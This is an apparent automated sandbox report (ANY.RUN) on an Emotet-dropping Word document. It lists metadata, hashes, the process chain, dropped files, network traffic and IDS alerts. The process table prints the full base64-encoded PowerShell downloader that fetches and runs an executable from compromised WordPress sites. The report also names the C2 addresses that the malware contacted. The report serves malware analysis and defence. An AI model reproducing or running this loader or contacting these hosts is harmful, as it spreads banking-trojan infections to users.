File name: | Documento_0910.doc |
Full analysis: | https://app.any.run/tasks/29c7dac8-cd96-4c59-a6ef-1180857a242d |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 16:08:55 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Metal, Subject: 24 hour, Author: Opal Volkman, Keywords: Product, Comments: full-range, Template: Normal.dotm, Last Saved By: Bert Blanda, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 14:30:00 2019, Last Saved Time/Date: Wed Oct 9 14:30:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 173, Security: 0 |
MD5: | AA530D99AF94D45CF7D9F5AC0833836B |
SHA1: | 35AC3D7D203C0126EE62B79E68637C89A2884527 |
SHA256: | 582C2F9A4B2EFDF5CA799D4F115B0699A908582EA984B696CD1F1397B356838E |
SSDEEP: | 6144:isJdGk8WrLkI07NSU4jJnUATfDXNcFQrQ7/4pm:isJdGk8AX07NSU4VVPXNcFXQpm |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Mitchell |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 202 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Bashirian, Thiel and Runolfsson |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 173 |
Words: | 30 |
Pages: | 1 |
ModifyDate: | 2019:10:09 13:30:00 |
CreateDate: | 2019:10:09 13:30:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Bert Blanda |
Template: | Normal.dotm |
Comments: | full-range |
Keywords: | Product |
Author: | Opal Volkman |
Subject: | 24 hour |
Title: | Metal |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3048 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Documento_0910.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2828 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjAGMAOQAwADAAMAAwADcAYgAwADYAPQAnAHgAMAB4ADgAMgA4AGIAMgAwAHgAMAAnADsAJABiADMAMAAzAGMAMAAwAHgAYgAxADAAIAA9ACAAJwA5ADkANgAnADsAJAB4ADIAOAAzADQAMAAzADQAMQA4ADEAPQAnAGIANQA0ADUANAAzAGIAOQB4ADAANAAnADsAJAB4ADIAOQA2ADMAMAA2AGIAMwA0ADEAOQAwAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABiADMAMAAzAGMAMAAwAHgAYgAxADAAKwAnAC4AZQB4AGUAJwA7ACQAYwAwADAAYgAwADAANAA5ADAAMwA1ADYAPQAnAGMAMAAwADMANQA1ADYANwAwADMANgAnADsAJABiADAANAA5ADAAMQA5AGMAMgA1ADAAMQA2AD0AJgAoACcAbgAnACsAJwBlAHcALQAnACsAJwBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAEUAdAAuAHcARQBiAGMAbABJAEUAbgB0ADsAJAB4ADUANgAzADUAMABjADAAMAA0ADAAMAA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGIAcgBpAGQAYQBsAG0AZQBoAG4AZABpAHMAdAB1AGQAaQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBlAGwAbAB2AHEAYQA2AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AbwBzAGgAdQBuAHYAaQByAGcAaQBuAGgAYQBpAHIAYwBvAC4AYwBvAG0ALwBjAG8AbQBwAGEAdABpAGIAaQBsAGkAdAB5AC8AeQBuADgAZgBqADAAMAA0ADEAOQAvAEAAaAB0AHQAcAA6AC8ALwB3AGkAcwBhAHQAbABhAGcAcgBhAG4AagBhAC4AYwBvAG0ALwA3AGIAaQBlAGMAMwAvAHUAbQA5AGoAMwA2ADAANgAvAEAAaAB0AHQAcAA6AC8ALwAzAGQAcwBoAGEAcgBwAGUAZABnAGUALgBjAG8AbQAvAGQAYgBjAG8AbgBuAGUAYwB0AC8AeAAzADgANgA5ADEANQAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHQAaABlAGMAcgBlAGUAawBwAHYALgBjAG8AbQAvAGYAdQBuAGMAdABpAG8AbgAuAHkAbwB1AGQALwBpAGoAMQAvACcALgAiAHMAYABQAGwASQB0ACIAKAAnAEAAJwApADsAJABiADMAYwAyADEANAB4AHgANgA1AGIAMAA9ACcAYgA4AGMAMAAwADEAMQAzADAAMQA4ADAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAHgANAAwADAANwA2ADQAMwAzADAAMwAgAGkAbgAgACQAeAA1ADYAMwA1ADAAYwAwADAANAAwADAAKQB7AHQAcgB5AHsAJABiADAANAA5ADAAMQA5AGMAMgA1ADAAMQA2AC4AIgBkAGAATwBXAG4AbABPAEEAYABEAEYAaQBgAEwAZQAiACgAJAB4ADQAMAAwADcANgA0ADMAMwAwADMALAAgACQAeAAyADkANgAzADAANgBiADMANAAxADkAMAApADsAJAB4AHgANwA2ADQAMwB4ADMAOAB4ADIAYgBjAD0AJwB4ADgANgAxAHgAYgAwADgANAA4ADIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJAB4ADIAOQA2ADMAMAA2AGIAMwA0ADEAOQAwACkALgAiAEwARQBgAE4ARwB0AGgAIgAgAC0AZwBlACAAMgA4ADkAMwAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABgAEEAcgB0ACIAKAAkAHgAMgA5ADYAMwAwADYAYgAzADQAMQA5ADAAKQA7ACQAYwA4ADIAMAAxADAANgAwADYANQAwADMAPQAnAHgAOAAwAGIAYgAxADcANwBiADkANAA5ADMAJwA7AGIAcgBlAGEAawA7ACQAYwBiADAAeAAwADkANAB4AGIAMAAzAD0AJwB4AGIAMwA5AHgAMAA2ADAAMABjADMAMAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABiADYANwA2ADUAYwA5ADcAMwAwADIAPQAnAGMAOAA5AGMAOQA2AGMANQB4ADQAOAAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3584 | "C:\Users\admin\996.exe" | C:\Users\admin\996.exe | — | powershell.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
2512 | --9005f774 | C:\Users\admin\996.exe | 996.exe | |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
1416 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | 996.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
2500 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | msptermsizes.exe | |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRC94.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2828 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JPXKFF75JNZYFQ98CMQG.temp | — | |
MD5:— | SHA256:— | |||
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\93E5F912.wmf | wmf | |
MD5:8718FF1072AAB1BF50C13DA22F8B1402 | SHA256:107EEBFD99A54473397AE782701FE2F026B27D253DE8C63309A3E56F71662868 | |||
3048 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:789A80E7EAA48B5903FD26EC43984739 | SHA256:70098F0291EF162254E6FFA68E484F8DCFADC46436AA37E6ABBF923BECFFAF5B | |||
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\625D4AF0.wmf | wmf | |
MD5:4BEEC38493613A0C99E41892BE780818 | SHA256:D42D6FD6D9AD3A896E69417B235F8D0FD8464FFA9585E43DD74DF538697A2616 | |||
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8780CF3C.wmf | wmf | |
MD5:E4BED036296A739EC3F8DFAC25B1BC04 | SHA256:F2B2AFF4ED69CC10F4B7A1E0CBB262BA2323D073796F88A69460349D34EFF604 | |||
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6B1E1E7E.wmf | wmf | |
MD5:CB827D605694FF931573624D78A21BED | SHA256:8DE6BB584F7B7C0A76DEF382A4619979C5FC21B03CE342AECF63273B5443142A | |||
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6AFBC067.wmf | wmf | |
MD5:906D34AAB978D44CC36E9E4A17952ACD | SHA256:3E7A06A2F602033365D7C299BBFDDEA29D54CB7C5E74FCD362113DB8B54F4729 | |||
2828 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF101791.TMP | binary | |
MD5:57F2BEBD8AB4D14DFF05F8F1EE1B1091 | SHA256:24089794FD7207234A86BFD7344771ABD7A0BC15DCEB1A256EF927F010B65B1F | |||
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\77BBC4AA.wmf | wmf | |
MD5:493B28FFB650107603A2D44B413E1691 | SHA256:C14D30E58093377ECD80D38AF496FC7E994E71EEED8841C3DFFC4CDC98EF6784 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2828 | powershell.exe | GET | 200 | 103.129.99.179:80 | http://www.bridalmehndistudio.com/wp-admin/ellvqa6/ | unknown | executable | 612 Kb | suspicious |
2500 | msptermsizes.exe | GET | — | 37.187.5.82:8080 | http://37.187.5.82:8080/whoami.php | FR | — | — | malicious |
2500 | msptermsizes.exe | GET | — | 37.187.5.82:8080 | http://37.187.5.82:8080/whoami.php | FR | — | — | malicious |
2500 | msptermsizes.exe | POST | 200 | 91.83.93.105:8080 | http://91.83.93.105:8080/vermont/ | HU | binary | 1.38 Mb | malicious |
2500 | msptermsizes.exe | POST | — | 91.83.93.105:8080 | http://91.83.93.105:8080/arizona/schema/ | HU | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2500 | msptermsizes.exe | 91.83.93.105:8080 | — | Invitech Megoldasok Zrt. | HU | malicious |
2500 | msptermsizes.exe | 37.187.5.82:8080 | — | OVH SAS | FR | malicious |
2828 | powershell.exe | 103.129.99.179:80 | www.bridalmehndistudio.com | — | — | suspicious |
Domain | IP | Reputation |
---|---|---|
www.bridalmehndistudio.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2828 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2828 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
2828 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2828 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2500 | msptermsizes.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
2500 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |